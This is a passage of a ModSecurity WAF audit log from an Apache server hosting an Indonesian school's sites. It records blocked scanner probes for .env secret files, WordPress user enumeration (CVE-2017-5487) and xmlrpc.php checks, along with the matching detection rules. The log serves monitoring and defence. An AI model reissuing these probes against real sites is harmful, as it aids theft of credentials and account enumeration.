"apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746737138502648 867 (- - -) Stopwatch2: 1746737138502648 867; combined=341, p1=300, p2=0, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8473374-Z-- --4b234f01-A-- [09/May/2025:04:25:58 +0700] aB0hZi-fAO47ojYKsMoLYgAAAEM 103.236.140.4 56744 103.236.140.4 8181 --4b234f01-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 143.110.217.244 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 143.110.217.244 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --4b234f01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b234f01-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746739558715365 860 (- - -) Stopwatch2: 1746739558715365 860; combined=345, p1=310, p2=0, p3=0, p4=0, p5=34, sr=117, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b234f01-Z-- --2acdee19-A-- [09/May/2025:04:42:30 +0700] aB0lRi-fAO47ojYKsMoLlAAAAEY 103.236.140.4 56966 103.236.140.4 8181 --2acdee19-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.122.228.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.122.228.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2acdee19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2acdee19-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746740550957770 2333 (- - -) Stopwatch2: 1746740550957770 2333; combined=1093, p1=342, p2=726, p3=0, p4=0, p5=25, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2acdee19-Z-- --88512e65-A-- [09/May/2025:04:46:23 +0700] aB0mLy-fAO47ojYKsMoLpQAAAE4 103.236.140.4 57034 103.236.140.4 8181 --88512e65-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.224.183.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.224.183.40 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --88512e65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88512e65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746740783536209 2637 (- - -) Stopwatch2: 1746740783536209 2637; combined=1240, p1=410, p2=800, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88512e65-Z-- --d08fd805-A-- [09/May/2025:04:53:20 +0700] aB0n0FoC-7ITMWTA_c9yoAAAAMM 103.236.140.4 57120 103.236.140.4 8181 --d08fd805-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.177 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d08fd805-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d08fd805-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746741200800321 2893 (- - -) Stopwatch2: 1746741200800321 2893; combined=1222, p1=416, p2=776, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d08fd805-Z-- --e2390c31-A-- [09/May/2025:04:53:29 +0700] aB0n2R6q_ZMebht3q15KawAAAIE 103.236.140.4 57126 103.236.140.4 8181 --e2390c31-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.177 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e2390c31-C-- demo.sayHello --e2390c31-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2390c31-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746741209128567 5071 (- - -) Stopwatch2: 1746741209128567 5071; combined=3940, p1=469, p2=3260, p3=29, p4=31, p5=89, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2390c31-Z-- --abdd4b70-A-- [09/May/2025:04:54:05 +0700] aB0n_R6q_ZMebht3q15KbQAAAII 103.236.140.4 57134 103.236.140.4 8181 --abdd4b70-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 95.216.187.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 95.216.187.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --abdd4b70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --abdd4b70-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746741245474763 3491 (- - -) Stopwatch2: 1746741245474763 3491; combined=1470, p1=493, p2=946, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abdd4b70-Z-- --4b234f01-A-- [09/May/2025:04:54:08 +0700] aB0oAB6q_ZMebht3q15KbgAAAIQ 103.236.140.4 57136 103.236.140.4 8181 --4b234f01-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4b234f01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b234f01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746741248596050 2742 (- - -) Stopwatch2: 1746741248596050 2742; combined=1222, p1=405, p2=789, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b234f01-Z-- --63a14450-A-- [09/May/2025:04:54:18 +0700] aB0oCi-fAO47ojYKsMoLugAAAFc 103.236.140.4 57142 103.236.140.4 8181 --63a14450-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.36 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --63a14450-C-- demo.sayHello --63a14450-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --63a14450-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746741258056146 5339 (- - -) Stopwatch2: 1746741258056146 5339; combined=3965, p1=569, p2=3185, p3=23, p4=26, p5=94, sr=141, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63a14450-Z-- --57ad8800-A-- [09/May/2025:04:56:39 +0700] aB0ol1qQ1nOVx9fWpZS3ZgAAABM 103.236.140.4 57162 103.236.140.4 8181 --57ad8800-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --57ad8800-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57ad8800-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746741399111215 3134 (- - -) Stopwatch2: 1746741399111215 3134; combined=1367, p1=510, p2=827, p3=0, p4=0, p5=30, sr=157, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57ad8800-Z-- --755d3237-A-- [09/May/2025:04:56:46 +0700] aB0onlqQ1nOVx9fWpZS3aAAAABY 103.236.140.4 57170 103.236.140.4 8181 --755d3237-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.230 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --755d3237-C-- demo.sayHello --755d3237-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --755d3237-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746741406236161 5673 (- - -) Stopwatch2: 1746741406236161 5673; combined=4403, p1=561, p2=3644, p3=34, p4=37, p5=73, sr=132, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --755d3237-Z-- --d1a5b706-A-- [09/May/2025:05:26:18 +0700] aB0vii-fAO47ojYKsMoL2wAAAFA 103.236.140.4 57430 103.236.140.4 8181 --d1a5b706-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 163.53.81.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 163.53.81.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d1a5b706-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1a5b706-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746743178915227 3518 (- - -) Stopwatch2: 1746743178915227 3518; combined=1451, p1=472, p2=948, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1a5b706-Z-- --26087a1d-A-- [09/May/2025:05:32:13 +0700] aB0w7R6q_ZMebht3q15KnQAAAJQ 103.236.140.4 58456 103.236.140.4 8181 --26087a1d-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 167.99.210.137 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 167.99.210.137 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --26087a1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --26087a1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746743533935136 799 (- - -) Stopwatch2: 1746743533935136 799; combined=313, p1=279, p2=0, p3=0, p4=0, p5=34, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26087a1d-Z-- --20291055-A-- [09/May/2025:05:32:19 +0700] aB0w8y-fAO47ojYKsMoMlAAAAE0 103.236.140.4 58468 103.236.140.4 8181 --20291055-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.94.224.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.94.224.32 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --20291055-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --20291055-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746743539475528 2139 (- - -) Stopwatch2: 1746743539475528 2139; combined=957, p1=301, p2=630, p3=0, p4=0, p5=26, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20291055-Z-- --8c375b04-A-- [09/May/2025:05:55:46 +0700] aB02cloC-7ITMWTA_c9z_wAAAMA 103.236.140.4 58696 103.236.140.4 8181 --8c375b04-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --8c375b04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c375b04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746744946010209 939 (- - -) Stopwatch2: 1746744946010209 939; combined=337, p1=296, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c375b04-Z-- --66f83d63-A-- [09/May/2025:05:55:47 +0700] aB02cx6q_ZMebht3q15KwAAAAI8 103.236.140.4 58698 103.236.140.4 8181 --66f83d63-B-- GET /api/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --66f83d63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66f83d63-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746744947333669 700 (- - -) Stopwatch2: 1746744947333669 700; combined=262, p1=228, p2=0, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66f83d63-Z-- --981ce519-A-- [09/May/2025:05:55:49 +0700] aB02dS-fAO47ojYKsMoMrwAAAE4 103.236.140.4 58700 103.236.140.4 8181 --981ce519-B-- GET /.env.save HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --981ce519-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --981ce519-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746744949415711 676 (- - -) Stopwatch2: 1746744949415711 676; combined=260, p1=224, p2=0, p3=0, p4=0, p5=36, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --981ce519-Z-- --139b7f0d-A-- [09/May/2025:05:55:52 +0700] aB02eB6q_ZMebht3q15KwQAAAJA 103.236.140.4 58702 103.236.140.4 8181 --139b7f0d-B-- GET /.env.prod HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --139b7f0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --139b7f0d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746744952529234 818 (- - -) Stopwatch2: 1746744952529234 818; combined=304, p1=252, p2=0, p3=0, p4=0, p5=52, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --139b7f0d-Z-- --6f175707-A-- [09/May/2025:05:56:02 +0700] aB02glqQ1nOVx9fWpZS3hwAAAAA 103.236.140.4 58720 103.236.140.4 8181 --6f175707-B-- GET /dev/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --6f175707-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f175707-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity 